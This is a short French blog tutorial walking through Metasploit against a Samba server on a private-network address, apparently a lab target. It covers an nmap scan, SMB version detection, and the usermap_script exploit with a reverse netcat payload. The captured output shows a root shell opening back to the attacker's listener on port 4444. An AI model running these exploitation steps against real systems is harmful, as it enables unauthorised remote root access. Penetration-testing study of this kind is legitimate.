Metasploit: Exploitation d'une vulnérabilité Samba
Cet article contient des techniques pouvant être dangereuses si elles sont utilisées à mauvais escient.
Je ne suis pas responsable d'utilisations illégales et d'éventuels problèmes avec la loi en cas d'utilisation malveillante.
└─# nmap -sV 192.168.1.38
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP) Samba permet de partager des imprimantes... sur le réseau local. Version un peu vague entre 3.X et 4.X
msf6 > use auxiliary/scanner/smb/
12 auxiliary/scanner/smb/smb_version normal No SMB Version Detection
msf6 > use auxiliary/scanner/smb/smb_version
msf6 auxiliary(scanner/smb/smb_version) >
msf6 auxiliary(scanner/smb/smb_version) > set RHOSTS 192.168.1.38
RHOSTS => 192.168.1.38
msf6 auxiliary(scanner/smb/smb_version) > exploit
[*] 192.168.1.38:445 - Host could not be identified: Unix (Samba 3.0.20-Debian) N'a pas identifié la version mais donne indications Unix (Samba 3.2.20-Debian).
Recherche Internet permet de trouver des vulnérabilités Samba un exploit adapté dans Metasploit.
msf6 auxiliary(scanner/smb/smb_version) > use exploit/multi/samba/usermap_script Exploit trouvé sur internet
[*] No payload configured, defaulting to cmd/unix/reverse_netcat
msf6 exploit(multi/samba/usermap_script) >
msf6 exploit(multi/samba/usermap_script) > set RHOSTS 192.168.1.38
RHOSTS => 192.168.1.38
msf6 exploit(multi/samba/usermap_script) > exploit
[*] Started reverse TCP handler on 192.168.1.33:4444
[*] Command shell session 1 opened (192.168.1.33:4444 -> 192.168.1.38:58300) at 2022-06-20 09:37:04 +0200
pwd
/
whoami
root

Aucun commentaire:
Enregistrer un commentaire